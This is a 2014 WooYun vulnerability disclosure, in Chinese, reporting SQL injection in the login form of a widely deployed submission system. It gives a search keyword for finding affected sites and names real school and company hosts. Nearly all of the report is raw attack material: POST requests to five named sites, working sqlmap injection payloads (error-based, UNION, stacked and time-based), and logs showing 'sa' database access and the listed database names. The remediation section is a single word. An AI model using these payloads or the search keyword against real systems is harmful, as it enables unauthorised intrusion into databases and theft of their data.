漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-076272
漏洞标题:某通用型SQL注入漏洞影响大量学校及企业网站
相关厂商:cncert国家互联网应急中心
漏洞作者: Mr.leo
提交时间:2014-09-29 12:10
修复时间:2014-12-28 12:12
公开时间:2014-12-28 12:12
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-29: 细节已通知厂商并且等待厂商处理中
2014-09-30: 厂商已经确认,细节仅向厂商公开
2014-10-03: 细节向第三方安全合作伙伴开放
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-28: 细节向公众公开
简要描述:
BOOM!!!
详细说明:
搜索关键字:技术支持:南京杰诺瀚软件科技有限公司
开发的投稿系统
http://www.so.com/s?q=技术支持:南京杰诺瀚软件科技有限公司&pn=6&j=0&ls=0&src=srp_paging&fr=se6_drag&psid=fd6d2e7d82880c6dc196c2c8a1252a12
举5个案例证明:username参数没有过滤,导致注入
http://www.gjmzyfs.com/Web/Login.aspx
http://www.lcsjwk.com/Web/Login.aspx
http://www.jsnyxb.com/Web/Login.aspx
http://ctc.hlglzz.com/Web/Login.aspx
http://xb.cuit.edu.cn/Web/Login.aspx
1、POST /Web/Login.aspx HTTP/1.1
Host: www.cnemergency.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://www.cnemergency.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cnemergency.com/Web/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: reurl=index.aspx
username=1&password=2&butOk=+%E7%99%BB++%E5%BD%95+
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: username
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=1' AND 9341=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR
(97)+CHAR(58)+(SELECT (CASE WHEN (9341=9341) THEN CHAR(49) ELSE CHAR(48) END))+C
HAR(58)+CHAR(102)+CHAR(107)+CHAR(102)+CHAR(58))) AND 'bbVN'='bbVN&password=2&but
Ok= ? ?
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=1' UNION ALL SELECT CHAR(58)+CHAR(111)+CHAR(109)+CHAR(97)+
CHAR(58)+CHAR(88)+CHAR(121)+CHAR(120)+CHAR(72)+CHAR(102)+CHAR(89)+CHAR(121)+CHAR
(115)+CHAR(122)+CHAR(101)+CHAR(58)+CHAR(102)+CHAR(107)+CHAR(102)+CHAR(58)-- &pas
sword=2&butOk= ? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1'; WAITFOR DELAY '0:0:5';--&password=2&butOk= ? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1' WAITFOR DELAY '0:0:5'--&password=2&butOk= ? ?
---
[19:02:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:02:19] [INFO] fetching current user
current user: 'sa'
[19:02:19] [INFO] fetching current database
current database: 'jjyx'
[19:02:19] [INFO] fetching database names
[19:02:22] [INFO] the SQL query used returns 59 entries
[19:02:31] [INFO] retrieved: "bl"
[19:02:40] [INFO] retrieved: "cdxxgc"
[19:02:40] [INFO] retrieved: "cg"
[19:02:40] [INFO] retrieved: "cghy"
[19:02:40] [INFO] retrieved: "cy"
[19:02:40] [INFO] retrieved: "cymx"
[19:02:40] [INFO] retrieved: "d1"
[19:02:40] [INFO] retrieved: "demcom"
[19:02:40] [INFO] retrieved: "demo"
[19:02:40] [INFO] retrieved: "dj"
[19:02:40] [INFO] retrieved: "dxjykx"
[19:02:40] [INFO] retrieved: "Eye"
[19:02:40] [INFO] retrieved: "gjzhyx"
[19:02:40] [INFO] retrieved: "GuaHao"
[19:02:40] [INFO] retrieved: "hh"
[19:02:40] [INFO] retrieved: "hhzrkx"
[19:02:40] [INFO] retrieved: "hlgl"
[19:02:40] [INFO] retrieved: "hnxbyx"
[19:02:40] [INFO] retrieved: "hxyqdz"
[19:02:49] [INFO] retrieved: "j4e"
[19:02:50] [INFO] retrieved: "jjyx"
[19:02:53] [INFO] retrieved: "lcjsyx"
[19:02:53] [INFO] retrieved: "lcjyzzs"
[19:02:53] [INFO] retrieved: "lcsjbx"
[19:02:53] [INFO] retrieved: "lcsjwk"
[19:02:53] [INFO] retrieved: "lnyxybj"
[19:02:53] [INFO] retrieved: "main"
[19:02:56] [INFO] retrieved: "master"
[19:02:56] [INFO] retrieved: "mfskin"
[19:02:56] [INFO] retrieved: "model"
[19:02:56] [INFO] retrieved: "mrzxwk"
[19:02:56] [INFO] retrieved: "msdb"
[19:02:56] [INFO] retrieved: "mz"
[19:02:56] [INFO] retrieved: "mzyfs"
[19:03:05] [INFO] retrieved: "njsd"
[19:03:05] [INFO] retrieved: "nky"
[19:03:05] [INFO] retrieved: "Northwind"
[19:03:05] [INFO] retrieved: "nxgb"
[19:03:05] [INFO] retrieved: "nydxxb"
[19:03:05] [INFO] retrieved: "pifu"
[19:03:05] [INFO] retrieved: "pubs"
[19:03:05] [INFO] retrieved: "rfic"
[19:03:05] [INFO] retrieved: "SMS"
[19:03:05] [INFO] retrieved: "st"
[19:03:08] [INFO] retrieved: "sypfb"
2、POST /Web/Login.aspx HTTP/1.1
Host: gaojian.xhnj.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://gaojian.xhnj.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://gaojian.xhnj.com/Web/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: reurl=index.aspx
username=1&password=2&butOk=+%E7%99%BB++%E5%BD%95+
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: username
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=1' UNION ALL SELECT CHAR(58)+CHAR(114)+CHAR(122)+CHAR(101)
+CHAR(58)+CHAR(107)+CHAR(88)+CHAR(85)+CHAR(112)+CHAR(112)+CHAR(72)+CHAR(100)+CHA
R(119)+CHAR(114)+CHAR(103)+CHAR(58)+CHAR(100)+CHAR(99)+CHAR(107)+CHAR(58)-- &pas
sword=2&butOk= ? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1'; WAITFOR DELAY '0:0:5';--&password=2&butOk= ? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1' WAITFOR DELAY '0:0:5'--&password=2&butOk= ? ?
---
[19:09:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:09:20] [INFO] fetching current user
current user: 'sa'
[19:09:20] [INFO] fetching current database
current database: 'xhnj'
[19:09:20] [INFO] fetching database names
[19:09:20] [INFO] the SQL query used returns 59 entries
[19:09:20] [INFO] retrieved: "bl"
[19:09:20] [INFO] retrieved: "cdxxgc"
[19:09:20] [INFO] retrieved: "cg"
[19:09:20] [INFO] retrieved: "cghy"
[19:09:20] [INFO] retrieved: "cy"
[19:09:20] [INFO] retrieved: "cymx"
[19:09:23] [INFO] retrieved: "d1"
[19:09:23] [INFO] retrieved: "demcom"
[19:09:23] [INFO] retrieved: "demo"
[19:09:23] [INFO] retrieved: "dj"
[19:09:23] [INFO] retrieved: "dxjykx"
[19:09:24] [INFO] retrieved: "Eye"
[19:09:27] [INFO] retrieved: "gjzhyx"
[19:09:27] [INFO] retrieved: "GuaHao"
[19:09:27] [INFO] retrieved: "hh"
[19:09:27] [INFO] retrieved: "hhzrkx"
[19:09:27] [INFO] retrieved: "hlgl"
[19:09:27] [INFO] retrieved: "hnxbyx"
[19:09:27] [INFO] retrieved: "hxyqdz"
[19:09:27] [INFO] retrieved: "j4e"
[19:09:27] [INFO] retrieved: "jjyx"
[19:09:30] [INFO] retrieved: "lcjsyx"
[19:09:30] [INFO] retrieved: "lcjyzzs"
3、POST /Web/Login.aspx HTTP/1.1
Host: www.lcsjwk.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://www.lcsjwk.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lcsjwk.com/Web/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: reurl=index.aspx
username=1&password=2&butOk=+%E7%99%BB++%E5%BD%95+
Place: POST
Parameter: username
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=1' UNION ALL SELECT CHAR(58)+CHAR(116)+CHAR(118)+CHAR(97)+
CHAR(58)+CHAR(100)+CHAR(117)+CHAR(113)+CHAR(88)+CHAR(80)+CHAR(113)+CHAR(113)+CHA
R(114)+CHAR(82)+CHAR(87)+CHAR(58)+CHAR(108)+CHAR(112)+CHAR(106)+CHAR(58)-- &pass
word=2&butOk= ? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1'; WAITFOR DELAY '0:0:5';--&password=2&butOk= ? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1' WAITFOR DELAY '0:0:5'--&password=2&butOk= ? ?
---
[19:11:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:11:32] [INFO] fetching current user
current user: 'sa'
[19:11:32] [INFO] fetching current database
current database: 'lcsjwk'
[19:11:32] [INFO] fetching database names
[19:11:33] [INFO] the SQL query used returns 59 entries
[19:11:33] [INFO] retrieved: "bl"
[19:11:33] [INFO] retrieved: "cdxxgc"
[19:11:33] [INFO] retrieved: "cg"
[19:11:33] [INFO] retrieved: "cghy"
[19:11:33] [INFO] retrieved: "cy"
[19:11:33] [INFO] retrieved: "cymx"
[19:11:33] [INFO] retrieved: "d1"
[19:11:33] [INFO] retrieved: "demcom"
[19:11:33] [INFO] retrieved: "demo"
[19:11:33] [INFO] retrieved: "dj"
[19:11:33] [INFO] retrieved: "dxjykx"
[19:11:33] [INFO] retrieved: "Eye"
[19:11:33] [INFO] retrieved: "gjzhyx"
[19:11:33] [INFO] retrieved: "GuaHao"
[19:11:33] [INFO] retrieved: "hh"
[19:11:33] [INFO] retrieved: "hhzrkx"
[19:11:33] [INFO] retrieved: "hlgl"
[19:11:33] [INFO] retrieved: "hnxbyx"
[19:11:33] [INFO] retrieved: "hxyqdz"
[19:11:33] [INFO] retrieved: "j4e"
[19:11:33] [INFO] retrieved: "jjyx"
[19:11:33] [INFO] retrieved: "lcjsyx"
[19:11:33] [INFO] retrieved: "lcjyzzs"
[19:11:33] [INFO] retrieved: "lcsjbx"
[19:11:33] [INFO] retrieved: "lcsjwk"
[19:11:33] [INFO] retrieved: "lnyxybj"
[19:11:33] [INFO] retrieved: "main"
[19:11:33] [INFO] retrieved: "master"
[19:11:33] [INFO] retrieved: "mfskin"
[19:11:33] [INFO] retrieved: "model"
[19:11:33] [INFO] retrieved: "mrzxwk"
[19:11:34] [INFO] retrieved: "msdb"
[19:11:34] [INFO] retrieved: "mz"
[19:11:34] [INFO] retrieved: "mzyfs"
[19:11:34] [INFO] retrieved: "njsd"
[19:11:34] [INFO] retrieved: "nky"
[19:11:34] [INFO] retrieved: "Northwind"
[19:11:34] [INFO] retrieved: "nxgb"
4、POST /Web/Login.aspx HTTP/1.1
Host: www.jsnyxb.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://www.jsnyxb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.jsnyxb.com/Web/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: reurl=index.aspx
username=1&password=2&butOk=+%E7%99%BB++%E5%BD%95+
Place: POST
Parameter: username
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=1' UNION ALL SELECT CHAR(58)+CHAR(102)+CHAR(97)+CHAR(115)+
CHAR(58)+CHAR(100)+CHAR(115)+CHAR(85)+CHAR(88)+CHAR(104)+CHAR(104)+CHAR(90)+CHAR
(121)+CHAR(86)+CHAR(74)+CHAR(58)+CHAR(122)+CHAR(102)+CHAR(109)+CHAR(58)-- &passw
ord=2&butOk= ? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1'; WAITFOR DELAY '0:0:5';--&password=2&butOk= ? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1' WAITFOR DELAY '0:0:5'--&password=2&butOk= ? ?
---
[19:12:40] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:12:40] [INFO] fetching current user
current user: 'sa'
[19:12:40] [INFO] fetching current database
current database: 'nky'
[19:12:40] [INFO] fetching database names
[19:12:41] [INFO] the SQL query used returns 59 entries
[19:12:41] [INFO] retrieved: "bl"
[19:12:41] [INFO] retrieved: "cdxxgc"
[19:12:41] [INFO] retrieved: "cg"
[19:12:41] [INFO] retrieved: "cghy"
[19:12:41] [INFO] retrieved: "cy"
[19:12:41] [INFO] retrieved: "cymx"
[19:12:41] [INFO] retrieved: "d1"
[19:12:41] [INFO] retrieved: "demcom"
[19:12:41] [INFO] retrieved: "demo"
[19:12:41] [INFO] retrieved: "dj"
[19:12:41] [INFO] retrieved: "dxjykx"
[19:12:41] [INFO] retrieved: "Eye"
[19:12:41] [INFO] retrieved: "gjzhyx"
[19:12:41] [INFO] retrieved: "GuaHao"
[19:12:41] [INFO] retrieved: "hh"
[19:12:41] [INFO] retrieved: "hhzrkx"
[19:12:41] [INFO] retrieved: "hlgl"
[19:12:41] [INFO] retrieved: "hnxbyx"
[19:12:41] [INFO] retrieved: "hxyqdz"
[19:12:41] [INFO] retrieved: "j4e"
[19:12:41] [INFO] retrieved: "jjyx"
[19:12:41] [INFO] retrieved: "lcjsyx"
[19:12:41] [INFO] retrieved: "lcjyzzs"
[19:12:41] [INFO] retrieved: "lcsjbx"
[19:12:41] [INFO] retrieved: "lcsjwk"
[19:12:41] [INFO] retrieved: "lnyxybj"
[19:12:41] [INFO] retrieved: "main"
[19:12:42] [INFO] retrieved: "master"
[19:12:42] [INFO] retrieved: "mfskin"
[19:12:42] [INFO] retrieved: "model"
[19:12:42] [INFO] retrieved: "mrzxwk"
[19:12:42] [INFO] retrieved: "msdb"
[19:12:42] [INFO] retrieved: "mz"
[19:12:42] [INFO] retrieved: "mzyfs"
[19:12:42] [INFO] retrieved: "njsd"
5、POST /Web/Login.aspx HTTP/1.1
Host: ctc.hlglzz.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://ctc.hlglzz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ctc.hlglzz.com/Web/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: reurl=index.aspx
username=1&password=2&butOk=+%E7%99%BB++%E5%BD%95+
Place: POST
Parameter: username
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=1' UNION ALL SELECT CHAR(58)+CHAR(99)+CHAR(120)+CHAR(111)+
CHAR(58)+CHAR(97)+CHAR(99)+CHAR(90)+CHAR(83)+CHAR(80)+CHAR(118)+CHAR(81)+CHAR(10
3)+CHAR(80)+CHAR(72)+CHAR(58)+CHAR(116)+CHAR(97)+CHAR(99)+CHAR(58)-- &password=2
&butOk= ? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1'; WAITFOR DELAY '0:0:5';--&password=2&butOk= ? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1' WAITFOR DELAY '0:0:5'--&password=2&butOk= ? ?
---
[19:13:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:13:29] [INFO] fetching current user
current user: 'sa'
[19:13:29] [INFO] fetching current database
current database: 'hlgl'
[19:13:29] [INFO] fetching database names
[19:13:29] [INFO] the SQL query used returns 59 entries
[19:13:29] [INFO] retrieved: "bl"
[19:13:29] [INFO] retrieved: "cdxxgc"
[19:13:29] [INFO] retrieved: "cg"
[19:13:29] [INFO] retrieved: "cghy"
[19:13:29] [INFO] retrieved: "cy"
[19:13:29] [INFO] retrieved: "cymx"
[19:13:29] [INFO] retrieved: "d1"
[19:13:29] [INFO] retrieved: "demcom"
[19:13:29] [INFO] retrieved: "demo"
[19:13:29] [INFO] retrieved: "dj"
[19:13:29] [INFO] retrieved: "dxjykx"
[19:13:29] [INFO] retrieved: "Eye"
[19:13:29] [INFO] retrieved: "gjzhyx"
[19:13:29] [INFO] retrieved: "GuaHao"
[19:13:29] [INFO] retrieved: "hh"
[19:13:30] [INFO] retrieved: "hhzrkx"
[19:13:30] [INFO] retrieved: "hlgl"
[19:13:30] [INFO] retrieved: "hnxbyx"
[19:13:30] [INFO] retrieved: "hxyqdz"
[19:13:30] [INFO] retrieved: "j4e"
[19:13:30] [INFO] retrieved: "jjyx"
[19:13:30] [INFO] retrieved: "lcjsyx"
[19:13:30] [INFO] retrieved: "lcjyzzs"
[19:13:30] [INFO] retrieved: "lcsjbx"
[19:13:30] [INFO] retrieved: "lcsjwk"
[19:13:30] [INFO] retrieved: "lnyxybj"
[19:13:30] [INFO] retrieved: "main"
[19:13:30] [INFO] retrieved: "master"
[19:13:30] [INFO] retrieved: "mfskin"
[19:13:30] [INFO] retrieved: "model"
[19:13:30] [INFO] retrieved: "mrzxwk"
[19:13:30] [INFO] retrieved: "msdb"
[19:13:30] [INFO] retrieved: "mz"
[19:13:30] [INFO] retrieved: "mzyfs"
[19:13:30] [INFO] retrieved: "njsd"
[19:13:30] [INFO] retrieved: "nky"
[19:13:30] [INFO] retrieved: "Northwind"
[19:13:30] [INFO] retrieved: "nxgb"
漏洞证明:
已经证明
修复方案:
过滤
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-09-30 10:06
厂商回复:
最新状态:
暂无